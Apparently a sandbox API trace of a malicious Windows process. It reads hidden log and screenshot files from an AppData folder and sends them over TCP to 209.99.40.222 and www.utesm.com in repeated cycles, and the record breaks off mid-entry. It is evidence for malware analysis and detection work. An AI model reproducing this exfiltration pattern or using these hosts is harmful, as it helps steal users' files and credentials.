NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.689] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0246.689] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.689] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0246.689] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.689] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.693] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0246.697] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0246.698] NtClose (Handle=0x1344) returned 0x0 [0246.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.699] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.699] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.699] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.699] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.699] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.699] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.699] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.699] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.699] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.699] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0246.700] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.700] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.700] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0246.700] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0246.701] NtClose (Handle=0x1344) returned 0x0 [0246.701] socket (af=2, type=1, protocol=6) returned 0x1344 [0246.701] connect (s=0x1344, name=0x3f36980*(sa_family=2, sin_port=0x50, sin_addr="209.99.40.222"), namelen=16) returned 0 [0246.837] RtlIntegerToChar (in: Value=0xc78, Base=0x0, Length=0x8, String=0x26ef698 | out: String="3192") returned 0x0 [0246.837] send (s=0x1344, buf=0x2595c5a*, len=3712, flags=0) returned 3712 [0246.838] closesocket (s=0x1344) returned 0 [0246.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.838] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.838] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.838] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.838] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0246.839] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.839] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.839] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0246.839] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0246.840] NtClose (Handle=0x1344) returned 0x0 [0246.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.840] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.840] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.840] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.840] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0246.840] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0246.840] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.840] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.840] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0x1344, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0246.840] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0246.841] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0246.841] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef610, FileInformation=0x26ef620, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef610, FileInformation=0x26ef620) returned 0x0 [0246.891] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef610, Buffer=0x8fb984d, BufferLength=0x2ba28, ByteOffset=0x26ef608*=0, Key=0x0 | out: IoStatusBlock=0x26ef610, Buffer=0x8fb984d*) returned 0x0 [0246.894] NtClose (Handle=0x1344) returned 0x0 [0246.894] socket (af=2, type=1, protocol=6) returned 0x1344 [0246.895] connect (s=0x1344, name=0x3f36980*(sa_family=2, sin_port=0x50, sin_addr="209.99.40.222"), namelen=16) returned 0 [0247.036] RtlIntegerToChar (in: Value=0x4d970, Base=0x0, Length=0x8, String=0x26ef668 | out: String="317808") returned 0x0 [0247.044] send (s=0x1344, buf=0x9039840*, len=318334, flags=0) returned 318334 [0247.046] closesocket (s=0x1344) returned 0 [0247.046] socket (af=2, type=1, protocol=6) returned 0x1344 [0247.046] getaddrinfo (in: pNodeName="www.utesm.com", pServiceName="80", pHints=0x6f0bb58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bb88 | out: ppResult=0x6f0bb88*=0x6eff6f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f36380*(sa_family=2, sin_port=0x50, sin_addr="3.13.103.114"), ai_next=0x6efc6f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f363c0*(sa_family=2, sin_port=0x50, sin_addr="3.133.163.136"), ai_next=0x6eff670*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f36b00*(sa_family=2, sin_port=0x50, sin_addr="18.189.203.77"), ai_next=0x0)))) returned 0 [0247.210] connect (s=0x1344, name=0x3f36380*(sa_family=2, sin_port=0x50, sin_addr="3.13.103.114"), namelen=16) returned 0 [0247.318] send (s=0x1344, buf=0x25a505a*, len=164, flags=0) returned 164 [0247.319] setsockopt (s=0x1344, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0247.319] recv (in: s=0x1344, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 303 [0247.446] closesocket (s=0x1344) returned 0 [0247.446] Sleep (dwMilliseconds=0x7d0) [0247.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.451] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.451] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0247.451] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.451] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.451] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.451] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.451] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.451] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x28, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.451] NtClose (Handle=0x1344) returned 0x0 [0247.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.452] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.452] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.452] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.452] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.452] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.452] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.452] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0247.452] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.452] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.452] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.452] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0x1344, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0247.452] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0247.452] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0247.452] NtQueryInformationFile (in: FileHandle=0x1344, IoStatusBlock=0x26ef640, FileInformation=0x26ef650, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x26ef640, FileInformation=0x26ef650) returned 0x0 [0247.452] NtReadFile (in: FileHandle=0x1344, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x26ef640, Buffer=0x259185a, BufferLength=0x6ea, ByteOffset=0x26ef638*=0, Key=0x0 | out: IoStatusBlock=0x26ef640, Buffer=0x259185a*) returned 0x0 [0247.453] NtClose (Handle=0x1344) returned 0x0 [0247.453] socket (af=2, type=1, protocol=6) returned 0x1344 [0247.453] connect (s=0x1344, name=0x3f36380*(sa_family=2, sin_port=0x50, sin_addr="3.13.103.114"), namelen=16) returned 0 [0247.595] RtlIntegerToChar (in: Value=0xc78, Base=0x0, Length=0x8, String=0x26ef698 | out: String="3192") returned 0x0 [0247.595] send (s=0x1344, buf=0x2595c5a*, len=3688, flags=0) returned 3688 [0247.596] closesocket (s=0x1344) returned 0 [0247.596] RtlDosPathNameToNtPathName_U (in: 